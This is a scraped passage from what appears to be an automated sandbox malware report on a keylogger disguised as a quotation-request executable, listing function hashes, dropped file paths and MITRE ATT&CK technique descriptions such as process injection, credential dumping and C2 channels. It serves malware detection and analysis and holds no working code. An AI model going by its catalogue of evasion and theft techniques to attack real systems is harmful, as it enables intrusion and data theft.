Instruction Fuzzy Hash: E101D4737001196BCB11DE5AEC10BAF3BDADBC8290F14802EF605D7348DA758C129790

Function 0166ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b2303dbcc6a13398b400b3a37133eb2574d54688a814f2e78ad04afb27234d
Instruction ID: 60fb4c3b371a8c17d96e8e99860a0b3a863f4b1f813060980517a79d8dfabb7c
Opcode Fuzzy Hash: 08b2303dbcc6a13398b400b3a37133eb2574d54688a814f2e78ad04afb27234d
Instruction Fuzzy Hash: E3F0BB353006104B97166E6EDC54A2EBBDEEFC9A51355407DE909DB36AEF21CC038790

Function 0166E8E8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c694646e23b3a5c7b45f5f2e6092210a16ddfd357fea79596b1e9e054424a915
Instruction ID: adc733c14e26d0b602bf8163d7881314adcdfcccb49362df3d61916d26d65a63
Opcode Fuzzy Hash: c694646e23b3a5c7b45f5f2e6092210a16ddfd357fea79596b1e9e054424a915
Instruction Fuzzy Hash: 59012978E0020AAFDB01CFB8E844AAEBBB5FB48300F008476D910A3350D7395E56CF90

Function 016628A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb2757f6eccadd5e056f2413dc97cc328cff803101d25f203ce5f0f51e954b4
Instruction ID: 23df46af8bcf5cf55995532ab43b104e5e17fd45f5db9c71e6d09ce03d38f4a2
Opcode Fuzzy Hash: 9bb2757f6eccadd5e056f2413dc97cc328cff803101d25f203ce5f0f51e954b4
Instruction Fuzzy Hash: F7E02632D10327CBCB01EBE4EC400EFB734AEC2261B5986ABD02137194EB302218C7D1

Function 016628B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 631968152f92a8a085456fff605429584fd68494db96d47bbbf5d0c975dffc1b
Instruction ID: 2be7e9a532f9ddf656837a3c96b66edeb62f39ef54a242ce2bd4e50450fd548f
Opcode Fuzzy Hash: 631968152f92a8a085456fff605429584fd68494db96d47bbbf5d0c975dffc1b
Instruction Fuzzy Hash: 10D02B31D2022F83CF04E7A5DC004DFF738EEC2260B514622D41033000FB302658C2E0

Function 01666739 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 037547bcb5701bf53d1131d6e8738275fcccd50bcdc534701ca5c7913054f05e
Instruction ID: 45337c39e5caefb7206e27db3a2c5dcc0e22f95cc1fcfd817b65b05a36197d36
Opcode Fuzzy Hash: 037547bcb5701bf53d1131d6e8738275fcccd50bcdc534701ca5c7913054f05e
Instruction Fuzzy Hash: DED05E722003090AC345FB7DEC5579A7F6AEB80214F085934E0059A68ADE7C5C8A5661

Function 0166AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56c43fdaa2b99ef008b698ad52c977b8c4b4f5154ee56e99e8c9115f743e6da
Instruction ID: 8f9a43d6382dad18aa3c50f80907ebbbe13666f26db1fb66c01d2aba4057e5d8
Opcode Fuzzy Hash: d56c43fdaa2b99ef008b698ad52c977b8c4b4f5154ee56e99e8c9115f743e6da
Instruction Fuzzy Hash: E4D0677BB400189FCB149F99E8808DDF776FB98221B048116EA15E7265C6319925DB50

Function 01666748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 318197c44cd6e04fcead6014e267d83f0d9538d2a220ae2996dd6ec0f23c7bc4
Instruction ID: 3c2321383aaf859a50a294e16c0339f5c48cd84c9511d0cd0e8a1e92bd67c10f
Opcode Fuzzy Hash: 318197c44cd6e04fcead6014e267d83f0d9538d2a220ae2996dd6ec0f23c7bc4
Instruction Fuzzy Hash: 7EC012700007194AC645FF65EC95555376AF790204F409D34F1055568DDE7D1C895691

Non-executed Functions

Function 01666920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;sq, xrefs: 0166695E
\;sq, xrefs: 01666952
\;sq, xrefs: 0166692C
\;sq, xrefs: 01666936

Memory Dump Source

Source File: 0000000E.00000002.4516919392.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1660000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID: \;sq$\;sq$\;sq$\;sq
API String ID: 0-2251010532
Opcode ID: 3e461865ff20696b704ad03d9d3603067163312f4c7f4edb6060c4875519e36d
Instruction ID: 7957a0f81cc5d76b27104ddc94e2815d1ddd92b9d9ae1f00d61a0a19b0f95760
Opcode Fuzzy Hash: 3e461865ff20696b704ad03d9d3603067163312f4c7f4edb6060c4875519e36d
Instruction Fuzzy Hash: D1018F717141168FDB248A2ED8409A577EEAFC8664729436AE905CB372DF71EC42C790

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jnqeRRexnD.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1e5lt4vg.dcb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asb4y0ad.4e0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hs1dmcae.dz1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nscw2rby.mia.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbbdcaxc.lnv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uh5zlmxw.zdt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vdac2bg5.3eo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywn404b5.fgj.ps1

Windows Analysis Report
Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre